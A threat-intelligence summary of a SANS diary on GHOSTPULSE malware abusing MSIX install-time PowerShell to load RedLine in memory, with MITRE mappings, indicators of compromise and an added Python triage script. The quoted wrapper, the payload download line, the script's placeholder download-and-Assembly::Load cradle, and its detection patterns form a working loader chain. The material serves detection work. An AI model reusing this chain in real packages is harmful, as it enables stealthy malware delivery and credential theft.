MSIX packaging is being abused to deliver malware, with GHOSTPULSE leveraging automatic PowerShell execution during MSIX installation to run a payload. The analysis shows a VoiceMode (1).msix sample that uses a wrapper to trigger worldhack.ps1, which downloads and loads a remote PE payload (RedLine) in memory. #GHOSTPULSE #RedLine
Keypoints
- MSIX can automatically execute a PowerShell script during installation, enabling stealthy malware delivery.
- A sample VoiceMode (1).msix contains StartingScriptWrapper.ps1 and config.json to orchestrate payload execution.
- The wrapper passes a scriptPath from config.json (worldhack.ps1) to be executed via Invoke-Expression.
- worldhack.ps1 downloads the remote payload with System.Net.WebClient.DownloadData and loads the returned bytes as a .NET assembly.
- The downloaded payload is a RedLine component that is loaded in memory and executed through its EntryPoint.
- The sample has the SHA256 hash 82db2d060d69ab6f88b85b79cf16255ee30982db1228d6e94ea02bf4feb2f181 and low VirusTotal detection at the time of analysis, indicating stealthy delivery.
- The article warns to pay close attention to MSIX-based delivery as MSIX usage grows among attackers.
MITRE Techniques
- [T1059.001] PowerShell – The wrapper uses PowerShell to execute a script during package installation via Invoke-Expression, as shown by 'Param ( [Parameter(Mandatory=$true)] [string]$ScriptPathAndArguments ) try { invoke-expression $scriptPathAndArguments } catch { write-host $_.Exception.Message … }' and '"scriptPath": "worldhack.ps1"' in config.json.
- [T1105] Ingress Tool Transfer – The script downloads a remote payload with 'DownloadData("hxxps://browse-plus[.]com/didicert.jpg")' and loads it as a .NET assembly for execution.
- [T1055] Process Injection (in-memory) – The downloaded payload is loaded into memory via '[System.Reflection.Assembly]::Load($Name1)' and its EntryPoint is invoked, effectively running the payload inside the PowerShell process.
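The keypoints and techniques above describe one chain: a config.json scriptPath, a wrapper that Invoke-Expressions it, and a script that downloads and reflectively loads a PE. The triage script below is an added example (not code from the ISC diary) that opens an MSIX as the zip container it is, pulls every scriptPath from config.json (the nested PSF layout is assumed), and scans each referenced script for the cmdlets and APIs named on this page; the package it builds is constructed with placeholder contents and an invalid URL.

```python
"""Triage an MSIX (zip) for the PSF script-launch pattern: config.json scriptPath,
StartingScriptWrapper.ps1, and a script using Invoke-Expression / WebClient /
Assembly::Load. Added example; the demo package below is constructed."""
import io
import json
import re
import zipfile

# Patterns matching what the diary's wrapper and worldhack.ps1 use.
RISKY = {
    "invoke_expression": re.compile(r"invoke-expression|\biex\b", re.I),
    "webclient_download": re.compile(r"Net\.WebClient|DownloadData|DownloadString", re.I),
    "reflective_load": re.compile(r"Reflection\.Assembly\]::Load", re.I),
}

def _script_paths(node):
    """Yield every 'scriptPath' string anywhere in the JSON (layout not assumed)."""
    if isinstance(node, dict):
        for k, v in node.items():
            if k == "scriptPath" and isinstance(v, str):
                yield v
            yield from _script_paths(v)
    elif isinstance(node, list):
        for item in node:
            yield from _script_paths(item)

def triage_msix(data: bytes) -> dict:
    """Return wrapper presence, referenced scripts, and pattern hits per script."""
    findings = {"wrapper_present": False, "script_paths": [], "hits": {}}
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = set(z.namelist())
        findings["wrapper_present"] = any(n.lower().endswith("startingscriptwrapper.ps1") for n in names)
        for n in names:
            if n.lower().endswith("config.json"):
                try:
                    findings["script_paths"] += list(_script_paths(json.loads(z.read(n))))
                except ValueError:
                    continue  # not JSON; ignore
        for sp in findings["script_paths"]:
            member = next((n for n in names if n.lower().endswith(sp.lower())), None)
            if member is None:
                findings["hits"][sp] = ["missing_from_package"]  # script fetched later or removed
                continue
            text = z.read(member).decode("utf-8", "replace")
            findings["hits"][sp] = [k for k, rx in RISKY.items() if rx.search(text)]
    return findings

def build_demo_package(include_script: bool = True) -> bytes:
    """Constructed zip mirroring the sample's file names; contents are placeholders."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("config.json", json.dumps({"applications": [{"id": "App", "startScript": {"scriptPath": "worldhack.ps1"}}]}))
        z.writestr("StartingScriptWrapper.ps1", "Param([string]$ScriptPathAndArguments)\ninvoke-expression $ScriptPathAndArguments\n")
        if include_script:  # placeholder script, invalid host, nothing is fetched
            z.writestr("worldhack.ps1", "$c = New-Object System.Net.WebClient\n$b = $c.DownloadData('https://example.invalid/x')\n[System.Reflection.Assembly]::Load($b)\n")
    return buf.getvalue()
```

Run triage_msix over real packages from an email or download quarantine; a scriptPath that is missing from the package is itself worth a look, since the script may arrive at install time.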
Indicators of Compromise
- [URL] Remote payload URL – hxxps://browse-plus[.]com/didicert.jpg
- [SHA256] 82db2d060d69ab6f88b85b79cf16255ee30982db1228d6e94ea02bf4feb2f181
- [SHA256] a16abe0ece8dac8f512a23f81daf704ec3c797de3334b73f1f5fcb0be5370f62
- [File] VoiceMode (1).msix – sample MSIX package
- [File] StartingScriptWrapper.ps1 – wrapper script inside the MSIX
Read more: https://isc.sans.edu/diary/rss/30404